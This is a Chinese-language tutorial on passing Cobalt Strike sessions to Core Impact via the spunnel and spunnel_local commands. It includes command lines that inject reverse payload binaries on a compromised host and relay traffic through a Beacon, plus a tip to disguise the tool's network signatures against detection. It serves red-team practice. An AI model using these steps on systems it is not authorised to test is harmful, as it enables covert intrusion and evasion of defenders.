# 联动Core impact

## 前言

Core impact官网：<https://www.coresecurity.com/products/core-impact> （顺带一提收购cobalt strike的就是这家公司）

还是稍微简单介绍一下Core impact吧，Core impact简单来说就是一款商业渗透测试工具，它不同于普通的RAT，它更像MSF，自身带有很多exp模块，又和ExploitPack有些相似，不过ExploitPack自身RAT属性不强可以说是单纯的EXP集成平台包括漏洞利用，漏洞开发，调试一体。

但是我个人认为Core impact本身还是有些不足比如不跨平台（自身采用MFC开发模块则是python开发，通过python和C++混合编程，利用boost.python实现运行python模块），二是我感觉它RAT通讯这方面还有待加强，比较不错的是内网渗透中各种常用的功能确实集成的挺不错，二是对渗透过程中收集的各种信息有一定的整合和处理这点挺好。（我个人认为在渗透过程中对信息的收集和处理尤为重要，团队应该拥有一套自己的信息整合平台，用来处理在渗透过程中收集到的各类信息）

好了废话不多说了开始正题吧（安装什么的不提了）

## 正题

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRnj5NRByf1Nlpzr_nY%2F-MRnkl9DbIM6tOmgSU3S%2Fimage.png?alt=media\&token=7c4dfdd6-94f4-4c29-951c-fcecc544e8e0)

打开后你要先创建一个工作空间，输入项目名称和密码

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRo_aYbCseo8OSH7Bru%2F-MRodPVvnVAFXXVn9iHO%2Fimage.png?alt=media\&token=99adbf37-e02d-45ab-9b47-6e7cab5a3110)

创建完项目后要想联动CS你可以直接使用Core impact生成一个shellcode然后让CS使用shspawn命令直接注入shellcode进行派生会话。不过这里还是使用CS4.2专门为第三方工具提供一个功能吧（spunnel和spunnel\_local 注：这两个命令为4.2新增命令）

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsFcJXjL-8bzUtpKp4%2F-MRsI02TLhoxQZB7jMAW%2Fimage.png?alt=media\&token=c159917d-940f-4150-a061-1bdcde84a802)

这两个命令的作用其实都差不多，都是在目标机上绑定一个端口并将此端口的流量通过Beacon转发出来，比如我们msf生成一个x86 tcp payload指定连接ip是127.0.0.1端口是9090并且MSF开启监听，然后在cs上执行

```
spunnel x86 msf_ip 9090 msf_raw.bin
```

这样一来Beacon会在目标机本地监听9090端口等待msf payload连接，然后Beacon会通过Cobalt Strike服务端(运行teamserver的机器)将流量转发到msf\_ip的9090端口上。简单说一句话就是目标机本地9090端口的流量从CS服务端出到达MSF的9090端口。spunnel\_local命令和spunnel命令并没有太大区别只不过spunnel\_local命令的流量不是从CS服务端出而是从CS客户端出。

实际演示一下

首先使用Core impact选择执行Package and Register Agent模块来生成一个payload

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsFcJXjL-8bzUtpKp4%2F-MRsLEUECBTzZZYHp_d2%2Fimage.png?alt=media\&token=6b5a0df3-bc5c-4af0-86b1-64aa55f82064)

连接模式：connect from target（反向连接），端口：9090，连接地址：127.0.0.1，这样生成的payload到时候会连接目标机器本地的9090端口，而刚好我的Beacon会对9090端口进行监听转发

CS执行

```
spunnel_local x86 127.0.0.1 9090 1.bin
```

表示将目标机9090端口的流量转发到运行CS客户端机器的9090端口上，因为我的Core impact和CS客户端运行在一台机器上，而上面我们Core impact生成payload的时候已经开始监听本地的9090端口了。

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsT0nL4baFkkayirbk%2Fimage.png?alt=media\&token=03c62ea5-e887-4e97-b29d-cc8e0a6ce2e8)

这样一来成功派生了一个会话到Core impact上，并且流量是通过CS中转的也不会在目标机器上出现新的外连

![目标机](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsTdhhIMQNSi9meKZf%2Fimage.png?alt=media\&token=fb79cc5f-9cf5-41f7-85de-4e4b52864106)

![攻击机](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsTthJdjttWpDLbNAc%2Fimage.png?alt=media\&token=95449ffc-ac55-40ea-b177-9238c4bbd001)

这里提醒一点spunnel\_local命令流量转发是与CS登录用户关联的，你可以看到这里的client显示的是neo

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRs_Xg-vvDP7bvCE2Dr%2Fimage.png?alt=media\&token=7a6f15be-9736-40d9-a84b-f0a011013c19)

简单介绍一下Core impact基本使用

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsVdGg9lXX7ATE4tve%2Fimage.png?alt=media\&token=c5346d4e-af15-4692-97b3-06b6b6918142)

如果要执行各种模块可以直接拖到到目标

![右键目标也可以执行各种模块](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsWUroPBq_XTI9w7Jh%2Fimage.png?alt=media\&token=83c26304-570f-4d88-b5e9-23924623eee6)

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsXZEgsUJpZNL4w8qz%2Fimage.png?alt=media\&token=91286c49-7939-4d7e-8b24-6d9acd25ef17)

而各种模块的执行结果成功与否都会被记录可以在右边查看比如我这里执行的shell所有的输出全部能够在Module log里看到

![](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsWtISzyT49Yl2LPHZ%2Fimage.png?alt=media\&token=c4d81897-a812-46f5-8e2b-42a4c128d860)

![这里你可以执行各种向导它们会辅助进行渗透和信息收集](https://3226329500-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MDZyrMxFR2BnFjV82cS%2F-MRsRCcdR1BC__mKnl1D%2F-MRsYMcGtYFV6tWN_1x3%2Fimage.png?alt=media\&token=9be1fefc-c7e4-4513-85fc-9a88fda8edc5)

基本上介绍的就这么多顺便提醒一下Core impact通信特征比较明显最好自己处理一下，不过Payload支持的平台倒是不少有Linux，Mac OS X，OpenBSD，FreeBSD，Windows
